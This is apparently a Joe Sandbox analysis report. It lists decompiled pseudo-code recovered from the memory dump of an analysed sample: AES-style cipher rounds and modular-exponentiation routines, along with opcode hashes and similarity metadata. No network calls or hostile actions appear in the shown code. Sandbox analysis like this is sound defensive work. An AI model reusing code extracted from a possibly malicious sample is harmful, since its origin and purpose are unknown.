                                                                                                                            				_v44 =  *(0xf8a91fa0 + _t714 * 4) ^  *(0xf8a92fa0 + _t797 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t800 + 0xe27d3f6bdc0);
                                                                                                                            				_t803 = _v36;
                                                                                                                            				_v40 =  *(0xf8a91fa0 + _t714 * 4) ^  *(0xf8a92fa0 + _t800 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t803 + 0x1083cc9fdd60);
                                                                                                                            				_t716 = _v36 + 0x20;
                                                                                                                            				_v36 = _t716;
                                                                                                                            				_v24 = _v24 - 1;
                                                                                                                            				if (_v24 != 0) goto 0xf8a874b0;
                                                                                                                            				goto 0xf8a87654;
                                                                                                                            				_t806 = _v36;
                                                                                                                            				 *_t846 =  *(0xf8a91fa0 + _t716 * 4) ^  *(0xf8a92fa0 + _t803 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *_t806;
                                                                                                                            				_t809 = _v36;
                                                                                                                            				_v64 =  *(0xf8a91fa0 + _t716 * 4) ^  *(0xf8a92fa0 + _t806 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t809 + 0x25bf8a91fa0);
                                                                                                                            				_t812 = _v36;
                                                                                                                            				_v60 =  *(0xf8a91fa0 + _t716 * 4) ^  *(0xf8a92fa0 + _t809 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t812 + 0x4b7f1523f40);
                                                                                                                            				_t815 = _v36;
                                                                                                                            				_v56 =  *(0xf8a91fa0 + _t716 * 4) ^  *(0xf8a92fa0 + _t812 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t815 + 0x713e9fb5ee0);
                                                                                                                            				goto 0xf8a872f0;
                                                                                                                            				 *_t846 =  *(0xf8a947a0 + _t716 * 4) ^  *(0xf8a943a0 + _t815 * 4) ^  *0xBCBDB4E5E20 ^  *0xBCBDB4E5A20 ^  *(_v36 + 0xf8a947a0);
                                                                                                                            				 *((char*)(_a4 + 0xf8a947a0)) =  *_t846 >> 0x00000018 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0xf8a947a0)) =  *_t846 >> 0x00000010 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0xf8a947a0)) =  *_t846 >> 0x00000008 & 0x000000ff;
                                                                                                                            				_t822 = _a4;
                                                                                                                            				 *_t822 =  *_t846 & 0x000000ff;
                                                                                                                            				_v64 =  *(0xf8a947a0 + _t716 * 4) ^  *(0xf8a943a0 + _t822 * 4) ^  *0xBCBDB4E5E20 ^  *0xBCBDB4E5A20 ^  *(_v36 + 0xf8a947a0);
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947a4)) = _v64 >> 0x00000018 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947a4)) = _v64 >> 0x00000010 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947a4)) = _v64 >> 0x00000008 & 0x000000ff;
                                                                                                                            				_t829 = _a4;
                                                                                                                            				 *((char*)(_t829 + 4)) = _v64 & 0x000000ff;
                                                                                                                            				_v60 =  *(0xf8a947a0 + _t716 * 4) ^  *(0xf8a943a0 + _t829 * 4) ^  *0xBCBDB4E5E20 ^  *0xBCBDB4E5A20 ^  *(_v36 + 0xf8a947a0);
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947a8)) = _v60 >> 0x00000018 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947a8)) = _v60 >> 0x00000010 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947a8)) = _v60 >> 0x00000008 & 0x000000ff;
                                                                                                                            				_t836 = _a4;
                                                                                                                            				 *((char*)(_t836 + 8)) = _v60 & 0x000000ff;
                                                                                                                            				_v56 =  *(0xf8a947a0 + _t716 * 4) ^  *(0xf8a943a0 + _t836 * 4) ^  *0xBCBDB4E5E20 ^  *0xBCBDB4E5A20 ^  *(_v36 + 0xf8a947a0);
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947ac)) = _v56 >> 0x00000018 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947ac)) = _v56 >> 0x00000010 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0x25bf8a947ac)) = _v56 >> 0x00000008 & 0x000000ff;
                                                                                                                            				 *((char*)(_a4 + 0xc)) = _v56 & 0x000000ff;
                                                                                                                            				return 0;
                                                                                                                            			}














































                                                                                                                            0x25bf8a872ce
                                                                                                                            0x25bf8a872e2
                                                                                                                            0x25bf8a872ec
                                                                                                                            0x25bf8a8734b
                                                                                                                            0x25bf8a87353
                                                                                                                            0x25bf8a873b2
                                                                                                                            0x25bf8a873ba
                                                                                                                            0x25bf8a87419
                                                                                                                            0x25bf8a87421
                                                                                                                            0x25bf8a87480
                                                                                                                            0x25bf8a87488
                                                                                                                            0x25bf8a87491
                                                                                                                            0x25bf8a87495
                                                                                                                            0x25bf8a874a0
                                                                                                                            0x25bf8a874a9
                                                                                                                            0x25bf8a874ab
                                                                                                                            0x25bf8a8750c
                                                                                                                            0x25bf8a87514
                                                                                                                            0x25bf8a87573
                                                                                                                            0x25bf8a8757b
                                                                                                                            0x25bf8a875db
                                                                                                                            0x25bf8a875e3
                                                                                                                            0x25bf8a87643
                                                                                                                            0x25bf8a8764b
                                                                                                                            0x25bf8a8764f
                                                                                                                            0x25bf8a876b8
                                                                                                                            0x25bf8a876d4
                                                                                                                            0x25bf8a876f0
                                                                                                                            0x25bf8a8770c
                                                                                                                            0x25bf8a87720
                                                                                                                            0x25bf8a87725
                                                                                                                            0x25bf8a8778c
                                                                                                                            0x25bf8a877aa
                                                                                                                            0x25bf8a877c8
                                                                                                                            0x25bf8a877e6
                                                                                                                            0x25bf8a877fc
                                                                                                                            0x25bf8a87801
                                                                                                                            0x25bf8a87869
                                                                                                                            0x25bf8a87887
                                                                                                                            0x25bf8a878a5
                                                                                                                            0x25bf8a878c3
                                                                                                                            0x25bf8a878d9
                                                                                                                            0x25bf8a878de
                                                                                                                            0x25bf8a87946
                                                                                                                            0x25bf8a87964
                                                                                                                            0x25bf8a87982
                                                                                                                            0x25bf8a879a0
                                                                                                                            0x25bf8a879bb
                                                                                                                            0x25bf8a879c6

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e159a6cc57e26d344b09782dae72ac89cbff88d6f40c27d95e82b3f629b8c26
                                                                                                                            • Instruction ID: 023e1ea5f4846761320b79e4c670cafaf479b0edb002de75bde2b01a06bfe0cc
                                                                                                                            • Opcode Fuzzy Hash: 5e159a6cc57e26d344b09782dae72ac89cbff88d6f40c27d95e82b3f629b8c26
                                                                                                                            • Instruction Fuzzy Hash: BF5256B32189808BDB08CB1DE4A573AB7A1F3C9780F54852AF79A87799CB3CD554CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 59%
                                                                                                                            			E0000025B25BF8A69680(void* __ecx, void* __edx, void* __eflags, void* __rax, long long __rcx, long long __rdx, signed int __r8, long long __r9, void* __r10) {
                                                                                                                            				void* __rbx;
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* __rbp;
                                                                                                                            				void* __r12;
                                                                                                                            				void* _t135;
                                                                                                                            				void* _t137;
                                                                                                                            				void* _t139;
                                                                                                                            				void* _t141;
                                                                                                                            				void* _t146;
                                                                                                                            				signed int _t169;
                                                                                                                            				void* _t175;
                                                                                                                            				signed int _t179;
                                                                                                                            				signed int _t213;
                                                                                                                            				signed int _t218;
                                                                                                                            				signed int _t232;
                                                                                                                            				void* _t240;
                                                                                                                            				void* _t256;
                                                                                                                            				void* _t271;
                                                                                                                            				void* _t297;
                                                                                                                            				signed long long _t300;
                                                                                                                            				signed long long _t301;
                                                                                                                            				signed long long _t311;
                                                                                                                            				void* _t313;
                                                                                                                            				intOrPtr _t335;
                                                                                                                            				signed long long _t367;
                                                                                                                            				void* _t383;
                                                                                                                            				void* _t385;
                                                                                                                            				void* _t386;
                                                                                                                            				intOrPtr _t391;
                                                                                                                            				void* _t393;
                                                                                                                            				void* _t394;
                                                                                                                            				signed long long _t395;
                                                                                                                            				void* _t407;
                                                                                                                            				intOrPtr* _t408;
                                                                                                                            				signed int _t410;
                                                                                                                            				long long* _t415;
                                                                                                                            				void* _t416;
                                                                                                                            
                                                                                                                            				_t406 = __r10;
                                                                                                                            				_t393 = _t394 - 0x1788;
                                                                                                                            				E0000025B25BF8A7A9C0(0x1888, __rax, __r10, _t407);
                                                                                                                            				_t395 = _t394 - __rax;
                                                                                                                            				_t300 =  *0xf8a9c990; // 0x18002eb3c
                                                                                                                            				_t301 = _t300 ^ _t395;
                                                                                                                            				 *(_t393 + 0x1770) = _t301;
                                                                                                                            				 *((long long*)(_t395 + 0x28)) = __rcx;
                                                                                                                            				 *((long long*)(_t395 + 0x60)) = __r9;
                                                                                                                            				_t410 = __r8;
                                                                                                                            				 *((long long*)(_t395 + 0x58)) = __rdx;
                                                                                                                            				_t135 = E0000025B25BF8A66C64(__rdx);
                                                                                                                            				if (_t135 - 7 > 0) goto 0xf8a696dc;
                                                                                                                            				goto 0xf8a69720;
                                                                                                                            				if (_t135 - 0x24 > 0) goto 0xf8a696e8;
                                                                                                                            				goto 0xf8a69720;
                                                                                                                            				if (_t135 - 0x8c > 0) goto 0xf8a696f6;
                                                                                                                            				goto 0xf8a69720;
                                                                                                                            				if (_t135 - 0x1c2 > 0) goto 0xf8a69704;
                                                                                                                            				goto 0xf8a69720;
                                                                                                                            				if (_t135 - 0x517 > 0) goto 0xf8a69712;
                                                                                                                            				goto 0xf8a69720;
                                                                                                                            				dil = _t135 - 0xdc9 > 0;
                                                                                                                            				if (E0000025B25BF8A666B8(_t301, _t393 - 0x78, __rdx) != 0) goto 0xf8a69bf7;
                                                                                                                            				_t7 = _t383 - 1; // 0x5
                                                                                                                            				_t8 = _t301 + 1; // 0x1
                                                                                                                            				r14d = _t8;
                                                                                                                            				_t9 = _t301 + 1; // 0x1
                                                                                                                            				r15d = _t9;
                                                                                                                            				r14d = r14d << _t7;
                                                                                                                            				r15d = r15d << 7;
                                                                                                                            				_t179 = r14d;
                                                                                                                            				if (r14d - r15d >= 0) goto 0xf8a69773;
                                                                                                                            				_t137 = E0000025B25BF8A666B8(_t395 + 0x70, _t395 + 0x70 + (_t179 + _t179 * 2) * 8, __rdx);
                                                                                                                            				if (_t137 != 0) goto 0xf8a697b7;
                                                                                                                            				if (_t179 + 1 - r15d < 0) goto 0xf8a6974c;
                                                                                                                            				_t391 =  *((intOrPtr*)(_t395 + 0x28));
                                                                                                                            				if ( *((intOrPtr*)(_t393 + 0x17f0)) != 0) goto 0xf8a697f9;
                                                                                                                            				_t139 = E0000025B25BF8A66A00(__r8, _t395 + 0x20);
                                                                                                                            				if (_t139 != 0) goto 0xf8a69bc0;
                                                                                                                            				_t207 =  *__r8;
                                                                                                                            				if (1 + __r8 * 2 - 0x200 >= 0) goto 0xf8a697f0;
                                                                                                                            				if ( *__r8 - 0x100 >= 0) goto 0xf8a697f0;
                                                                                                                            				goto 0xf8a69822;
                                                                                                                            				_t256 = r14d - _t139;
                                                                                                                            				if (_t256 >= 0) goto 0xf8a697e0;
                                                                                                                            				_t385 = _t395 + 0x70 + (r14d + r14d * 2) * 8;
                                                                                                                            				_t141 = E0000025B25BF8A67578(1 + __r8 * 2, _t385, _t395 + 0x20);
                                                                                                                            				_t386 = _t385 + 0x18;
                                                                                                                            				_t314 = _t313 - 1;
                                                                                                                            				if (_t256 != 0) goto 0xf8a697cf;
                                                                                                                            				E0000025B25BF8A67578(_t141, _t393 - 0x78, _t395 + 0x20);
                                                                                                                            				goto 0xf8a69bf7;
                                                                                                                            				goto 0xf8a69822;
                                                                                                                            				if (_t137 != 1) goto 0xf8a6980c;
                                                                                                                            				E0000025B25BF8A6B648(_t137, _t393 - 0x78, _t395 + 0x20);
                                                                                                                            				goto 0xf8a69822;
                                                                                                                            				if (E0000025B25BF8A6B658( *__r8, _t137 - 1, r14d, _t313 - 1, _t393 - 0x78, _t395 + 0x20, _t391, _t393, _t406) != 0) goto 0xf8a69bc0;
                                                                                                                            				 *(_t395 + 0x30) = E0000025B25BF8A6B7B4;
                                                                                                                            				_t146 = E0000025B25BF8A666B8(r14d, _t395 + 0x40, _t395 + 0x20);
                                                                                                                            				if (_t146 != 0) goto 0xf8a69bc0;
                                                                                                                            				if ( *((intOrPtr*)(_t393 + 0x17f0)) != _t146) goto 0xf8a69870;
                                                                                                                            				if (E0000025B25BF8A66A64(r14d, _t313 - 1, _t395 + 0x40, _t410, _t391) != 0) goto 0xf8a69bb6;
                                                                                                                            				E0000025B25BF8A673C4(E0000025B25BF8A66A64(r14d, _t313 - 1, _t395 + 0x40, _t410, _t391), _t313 - 1, _t391, _t395 + 0x40, _t391, _t393, _t410, _t393 - 0x78);
                                                                                                                            				goto 0xf8a69889;
                                                                                                                            				E0000025B25BF8A67FD4(1, E0000025B25BF8A66A64(r14d, _t313 - 1, _t395 + 0x40, _t410, _t391), _t391);
                                                                                                                            				if (E0000025B25BF8A67AAC(_t207, 1, E0000025B25BF8A66A64(r14d, _t313 - 1, _t395 + 0x40, _t410, _t391), _t313 - 1, _t391, _t410, _t391, _t393, _t393 - 0x78) != 0) goto 0xf8a69bb6;
                                                                                                                            				 *((long long*)(_t395 + 0x28)) = _t395 + 0x70 + (r14d + r14d * 2) * 8;
                                                                                                                            				if (E0000025B25BF8A66480(_t313 - 1, _t393 - 0x78, _t395 + 0x70 + (r14d + r14d * 2) * 8) != 0) goto 0xf8a69bb6;
                                                                                                                            				_t42 = _t386 - 1; // -8
                                                                                                                            				if (_t42 <= 0) goto 0xf8a69901;
                                                                                                                            				if (E0000025B25BF8A66630( *((intOrPtr*)(_t395 + 0x28)),  *((intOrPtr*)(_t395 + 0x28)), _t393 - 0x78) != 0) goto 0xf8a69bb6;
                                                                                                                            				r8d =  *(_t395 + 0x20);
                                                                                                                            				if (E0000025B25BF8A6B7B4(_t207, _t240, E0000025B25BF8A66630( *((intOrPtr*)(_t395 + 0x28)),  *((intOrPtr*)(_t395 + 0x28)), _t393 - 0x78), _t313 - 1,  *((intOrPtr*)(_t395 + 0x28)), _t410, _t386, _t391, _t393, _t406, _t407) != 0) goto 0xf8a69bb6;
                                                                                                                            				_t46 = _t386 - 1; // -8
                                                                                                                            				if (1 - _t46 < 0) goto 0xf8a698c7;
                                                                                                                            				_t47 = _t416 + 1; // 0x2
                                                                                                                            				_t232 = _t47;
                                                                                                                            				if (_t232 - r15d >= 0) goto 0xf8a6996b;
                                                                                                                            				_t48 = _t391 - 1; // 0x1
                                                                                                                            				r13d = _t48;
                                                                                                                            				 *((long long*)(_t395 + 0x28)) = _t395 + 0x70 + (_t232 + _t232 * 2) * 8;
                                                                                                                            				if (E0000025B25BF8A6743C(_t313 - 1, _t395 + 0x70 + (r13d + r13d * 2) * 8, _t393 - 0x78, _t391, _t395 + 0x70 + (_t232 + _t232 * 2) * 8) != 0) goto 0xf8a69bb6;
                                                                                                                            				r8d =  *(_t395 + 0x20);
                                                                                                                            				_t335 =  *((intOrPtr*)(_t395 + 0x28));
                                                                                                                            				if ( *(_t395 + 0x30)() != 0) goto 0xf8a69bb6;
                                                                                                                            				r13d = r13d + 1;
                                                                                                                            				_t271 = _t232 + 1 - r15d;
                                                                                                                            				if (_t271 < 0) goto 0xf8a6990e;
                                                                                                                            				_t408 =  *((intOrPtr*)(_t395 + 0x58));
                                                                                                                            				_t415 =  *(_t395 + 0x30);
                                                                                                                            				r9d = 0;
                                                                                                                            				r8d = 0;
                                                                                                                            				 *((intOrPtr*)(_t395 + 0x3c)) = 0;
                                                                                                                            				_t67 = _t335 + 1; // 0x1
                                                                                                                            				r10d = _t67;
                                                                                                                            				 *(_t395 + 0x24) = r8d;
                                                                                                                            				 *((long long*)(_t395 + 0x28)) =  *_t408 - 1;
                                                                                                                            				goto 0xf8a699a0;
                                                                                                                            				_t367 =  *((intOrPtr*)(_t395 + 0x28));
                                                                                                                            				r10d = r10d - 1;
                                                                                                                            				 *((intOrPtr*)(_t395 + 0x38)) = r10d;
                                                                                                                            				if (_t271 != 0) goto 0xf8a699cf;
                                                                                                                            				if (_t367 == 0xffffffff) goto 0xf8a69b04;
                                                                                                                            				r10d = 0x1c;
                                                                                                                            				r9d =  *( *((intOrPtr*)(_t408 + 0x10)) + _t367 * 4);
                                                                                                                            				 *((intOrPtr*)(_t395 + 0x38)) = r10d;
                                                                                                                            				 *((long long*)(_t395 + 0x28)) = _t367 - 1;
                                                                                                                            				r9d = r9d + r9d;
                                                                                                                            				 *(_t395 + 0x30) = r9d;
                                                                                                                            				_t218 = r9d >> 0x0000001b & 0x00000001;
                                                                                                                            				if (0 != 0) goto 0xf8a699e8;
                                                                                                                            				if (_t218 == 0) goto 0xf8a6999b;
                                                                                                                            				if (0 != 1) goto 0xf8a69a32;
                                                                                                                            				if (_t218 != 0) goto 0xf8a69a32;
                                                                                                                            				if (E0000025B25BF8A66630(_t395 + 0x40, _t395 + 0x40, _t395 + 0x70 + (_t232 + _t232 * 2) * 8) != 0) goto 0xf8a69bb6;
                                                                                                                            				r8d =  *(_t395 + 0x20);
                                                                                                                            				if ( *_t415() != 0) goto 0xf8a69bb6;
                                                                                                                            				r8d =  *(_t395 + 0x24);
                                                                                                                            				goto 0xf8a69af0;
                                                                                                                            				r8d = r8d | _t218 << 6;
                                                                                                                            				 *((intOrPtr*)(_t395 + 0x3c)) = 2;
                                                                                                                            				 *(_t395 + 0x24) = r8d;
                                                                                                                            				if (1 != 7) goto 0xf8a699a0;
                                                                                                                            				if (7 <= 0) goto 0xf8a69a9c;
                                                                                                                            				if (E0000025B25BF8A66630(_t395 + 0x40, _t395 + 0x40, _t395 + 0x70 + (_t232 + _t232 * 2) * 8) != 0) goto 0xf8a69bb6;
                                                                                                                            				r8d =  *(_t395 + 0x20);
                                                                                                                            				if ( *_t415() != 0) goto 0xf8a69bb6;
                                                                                                                            				if (1 - 7 < 0) goto 0xf8a69a5e;
                                                                                                                            				r8d =  *(_t395 + 0x24);
                                                                                                                            				_t311 = r8d;
                                                                                                                            				if (E0000025B25BF8A6743C(_t314, _t395 + 0x40, _t395 + 0x70 + (_t311 + _t311 * 2) * 8, _t391, _t395 + 0x40) != 0) goto 0xf8a69bb6;
                                                                                                                            				r8d =  *(_t395 + 0x20);
                                                                                                                            				if ( *_t415() != 0) goto 0xf8a69bb6;
                                                                                                                            				_t101 = _t311 + 1; // 0x1
                                                                                                                            				_t213 = _t101;
                                                                                                                            				r8d = 0;
                                                                                                                            				 *((intOrPtr*)(_t395 + 0x3c)) = _t213;
                                                                                                                            				 *(_t395 + 0x24) = r8d;
                                                                                                                            				r9d =  *(_t395 + 0x30);
                                                                                                                            				r10d =  *((intOrPtr*)(_t395 + 0x38));
                                                                                                                            				goto 0xf8a6999b;
                                                                                                                            				if (_t213 != 2) goto 0xf8a69b86;
                                                                                                                            				if (0 <= 0) goto 0xf8a69b86;
                                                                                                                            				if (0 <= 0) goto 0xf8a69b86;
                                                                                                                            				if (E0000025B25BF8A66630(_t395 + 0x40, _t395 + 0x40, _t395 + 0x40) != 0) goto 0xf8a69bb6;
                                                                                                                            				r8d =  *(_t395 + 0x20);
                                                                                                                            				if ( *_t415() != 0) goto 0xf8a69bb6;
                                                                                                                            				_t169 =  *(_t395 + 0x24) +  *(_t395 + 0x24);
                                                                                                                            				 *(_t395 + 0x24) = _t169;
                                                                                                                            				if ((_t169 & r15d) == 0) goto 0xf8a69b80;
                                                                                                                            				if (E0000025B25BF8A6743C(_t314, _t395 + 0x40, _t393 - 0x78, _t391, _t395 + 0x40) != 0) goto 0xf8a69bb6;
                                                                                                                            				r8d =  *(_t395 + 0x20);
                                                                                                                            				if ( *_t415() != 0) goto 0xf8a69bb6;
                                                                                                                            				if (1 < 0) goto 0xf8a69b13;
                                                                                                                            				if ( *((intOrPtr*)(_t393 + 0x17f0)) != 0) goto 0xf8a69ba5;
                                                                                                                            				r8d =  *(_t395 + 0x20);
                                                                                                                            				if ( *_t415() != 0) goto 0xf8a69bb6;
                                                                                                                            				_t175 = E0000025B25BF8A67578(E0000025B25BF8A67578(E0000025B25BF8A69038(_t172, _t395 + 0x40,  *((intOrPtr*)(_t395 + 0x60))), _t395 + 0x40,  *((intOrPtr*)(_t395 + 0x60))), _t393 - 0x78,  *((intOrPtr*)(_t395 + 0x60)));
                                                                                                                            				_t297 = r14d - r15d;
                                                                                                                            				if (_t297 >= 0) goto 0xf8a69bf5;
                                                                                                                            				r15d = r15d - r14d;
                                                                                                                            				E0000025B25BF8A67578(_t175, _t395 + 0x70 + (r14d + r14d * 2) * 8,  *((intOrPtr*)(_t395 + 0x60)));
                                                                                                                            				if (_t297 != 0) goto 0xf8a69be4;
                                                                                                                            				return E0000025B25BF8A81A50(_t213, _t314,  *(_t393 + 0x1770) ^ _t395,  *((intOrPtr*)(_t395 + 0x60)), _t395 + 0x70 + (r14d + r14d * 2) * 8 + 0x18, _t391 - 1, _t393, _t410);
                                                                                                                            			}









































                                                                                                                            0x25bf8a69b48
                                                                                                                            0x25bf8a69b4f
                                                                                                                            0x25bf8a69b68
                                                                                                                            0x25bf8a69b6a
                                                                                                                            0x25bf8a69b7e
                                                                                                                            0x25bf8a69b84
                                                                                                                            0x25bf8a69b8d
                                                                                                                            0x25bf8a69b8f
                                                                                                                            0x25bf8a69ba3
                                                                                                                            0x25bf8a69bc4
                                                                                                                            0x25bf8a69bc9
                                                                                                                            0x25bf8a69bcc
                                                                                                                            0x25bf8a69bd6
                                                                                                                            0x25bf8a69be7
                                                                                                                            0x25bf8a69bf3
                                                                                                                            0x25bf8a69c19

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 18b8dc6c07b5b1a58e843c88cdd1a76dc6639984c07dc6614f9d507bdddf9ec5
                                                                                                                            • Instruction ID: f121dc4e2d767118da8b58a3605247d6e851543a15bf6e84250454b9ad4a3bcb
                                                                                                                            • Opcode Fuzzy Hash: 18b8dc6c07b5b1a58e843c88cdd1a76dc6639984c07dc6614f9d507bdddf9ec5
                                                                                                                            • Instruction Fuzzy Hash: 6CF1A663314E4282EF22CB15EC9C3AE63A1F7947A5F682115FA4987E8DEF34C905CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E0000025B25BF8A6916C(void* __ecx, void* __edx, void* __eflags, void* __rax, signed long long __rcx, long long __rdx, long long __r8, long long __r9) {
                                                                                                                            				void* __rbx;
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* __rbp;
                                                                                                                            				void* __r12;
                                                                                                                            				void* _t124;
                                                                                                                            				void* _t127;
                                                                                                                            				void* _t128;
                                                                                                                            				void* _t129;
                                                                                                                            				void* _t153;
                                                                                                                            				void* _t154;
                                                                                                                            				void* _t156;
                                                                                                                            				signed int _t160;
                                                                                                                            				void* _t189;
                                                                                                                            				signed int _t193;
                                                                                                                            				signed int _t207;
                                                                                                                            				void* _t229;
                                                                                                                            				void* _t241;
                                                                                                                            				void* _t265;
                                                                                                                            				signed long long _t268;
                                                                                                                            				signed long long _t269;
                                                                                                                            				signed long long _t276;
                                                                                                                            				signed long long _t278;
                                                                                                                            				void* _t280;
                                                                                                                            				long long _t281;
                                                                                                                            				signed long long _t304;
                                                                                                                            				void* _t352;
                                                                                                                            				void* _t359;
                                                                                                                            				void* _t362;
                                                                                                                            				void* _t363;
                                                                                                                            				signed long long _t364;
                                                                                                                            				void* _t379;
                                                                                                                            				void* _t380;
                                                                                                                            				long long _t381;
                                                                                                                            				long long* _t384;
                                                                                                                            				long long* _t385;
                                                                                                                            				void* _t388;
                                                                                                                            
                                                                                                                            				_t189 = __edx;
                                                                                                                            				_t362 = _t363 - 0x17a8;
                                                                                                                            				E0000025B25BF8A7A9C0(0x18a8, __rax, _t379, _t380);
                                                                                                                            				_t364 = _t363 - __rax;
                                                                                                                            				_t268 =  *0xf8a9c990; // 0x18002eb3c
                                                                                                                            				_t269 = _t268 ^ _t364;
                                                                                                                            				 *(_t362 + 0x1790) = _t269;
                                                                                                                            				 *(_t364 + 0x38) = __rcx;
                                                                                                                            				 *((long long*)(_t362 - 0x80)) = __r9;
                                                                                                                            				_t381 = __r8;
                                                                                                                            				 *((long long*)(_t364 + 0x20)) = __r8;
                                                                                                                            				 *((long long*)(_t364 + 0x58)) = __rdx;
                                                                                                                            				_t124 = E0000025B25BF8A66C64(__rdx);
                                                                                                                            				if (_t124 - 7 > 0) goto 0xf8a691c9;
                                                                                                                            				goto 0xf8a6920d;
                                                                                                                            				if (_t124 - 0x24 > 0) goto 0xf8a691d5;
                                                                                                                            				goto 0xf8a6920d;
                                                                                                                            				if (_t124 - 0x8c > 0) goto 0xf8a691e3;
                                                                                                                            				goto 0xf8a6920d;
                                                                                                                            				if (_t124 - 0x1c2 > 0) goto 0xf8a691f1;
                                                                                                                            				goto 0xf8a6920d;
                                                                                                                            				if (_t124 - 0x517 > 0) goto 0xf8a691ff;
                                                                                                                            				goto 0xf8a6920d;
                                                                                                                            				dil = _t124 - 0xdc9 > 0;
                                                                                                                            				if (E0000025B25BF8A666B8(_t269, _t362 - 0x58, __rdx) != 0) goto 0xf8a6965a;
                                                                                                                            				_t8 = _t352 - 1; // 0x5
                                                                                                                            				r13d = _t8;
                                                                                                                            				_t9 = _t269 + 1; // 0x1
                                                                                                                            				r15d = _t9;
                                                                                                                            				_t10 = _t269 + 1; // 0x1
                                                                                                                            				r14d = _t10;
                                                                                                                            				r15d = r15d << r13d;
                                                                                                                            				r14d = r14d << 7;
                                                                                                                            				_t160 = r15d;
                                                                                                                            				if (r15d - r14d >= 0) goto 0xf8a6925e;
                                                                                                                            				if (E0000025B25BF8A666B8(_t362 - 0x70, _t362 - 0x70 + (_t160 + _t160 * 2) * 8, __rdx) != 0) goto 0xf8a6929f;
                                                                                                                            				if (_t160 + 1 - r14d < 0) goto 0xf8a6923d;
                                                                                                                            				_t127 = E0000025B25BF8A666B8(_t362 - 0x70, _t364 + 0x68, __rdx);
                                                                                                                            				if (_t127 != 0) goto 0xf8a69624;
                                                                                                                            				if ( *((intOrPtr*)(_t362 + 0x1810)) != _t127) goto 0xf8a692d7;
                                                                                                                            				_t328 = __r8;
                                                                                                                            				_t128 = E0000025B25BF8A6B4D8( *((intOrPtr*)(_t362 + 0x1810)) - _t127, _t280, _t364 + 0x68, __r8, _t359, _t362, __r9);
                                                                                                                            				if (_t128 != 0) goto 0xf8a6961a;
                                                                                                                            				_t360 = E0000025B25BF8A6B384;
                                                                                                                            				 *((long long*)(_t364 + 0x28)) = E0000025B25BF8A6B384;
                                                                                                                            				goto 0xf8a692fa;
                                                                                                                            				_t229 = r15d - _t128;
                                                                                                                            				if (_t229 >= 0) goto 0xf8a692c7;
                                                                                                                            				_t129 = E0000025B25BF8A67578(_t128, _t362 - 0x70 + (r15d + r15d * 2) * 8, _t328);
                                                                                                                            				_t281 = _t280 - 1;
                                                                                                                            				if (_t229 != 0) goto 0xf8a692b6;
                                                                                                                            				E0000025B25BF8A67578(_t129, _t362 - 0x58, _t328);
                                                                                                                            				goto 0xf8a6965a;
                                                                                                                            				if (E0000025B25BF8A6B514(7, _t229, r15d, _t281, _t381, _t364 + 0x68, E0000025B25BF8A6B384, _t362, _t379) != 0) goto 0xf8a6961a;
                                                                                                                            				 *((long long*)(_t364 + 0x28)) = E0000025B25BF8A6B580;
                                                                                                                            				if (E0000025B25BF8A67AAC(7, _t189, E0000025B25BF8A6B514(7, _t229, r15d, _t281, _t381, _t364 + 0x68, E0000025B25BF8A6B384, _t362, _t379), _t281,  *(_t364 + 0x38), _t381, E0000025B25BF8A6B384, _t362, _t362 - 0x58) != 0) goto 0xf8a6961a;
                                                                                                                            				if (E0000025B25BF8A66480(_t281, _t362 - 0x58, _t362 - 0x70 + (r15d + r15d * 2) * 8) != 0) goto 0xf8a6961a;
                                                                                                                            				if (r13d <= 0) goto 0xf8a69378;
                                                                                                                            				if (E0000025B25BF8A66630(_t362 - 0x70 + (r15d + r15d * 2) * 8, _t362 - 0x70 + (r15d + r15d * 2) * 8, _t362 - 0x58) != 0) goto 0xf8a6961a;
                                                                                                                            				if ( *((intOrPtr*)(_t364 + 0x28))() != 0) goto 0xf8a6961a;
                                                                                                                            				if (1 - r13d < 0) goto 0xf8a69341;
                                                                                                                            				_t39 = _t388 + 1; // 0x2
                                                                                                                            				_t207 = _t39;
                                                                                                                            				if (_t207 - r14d >= 0) goto 0xf8a693df;
                                                                                                                            				_t40 = _t360 - 1; // 0x1
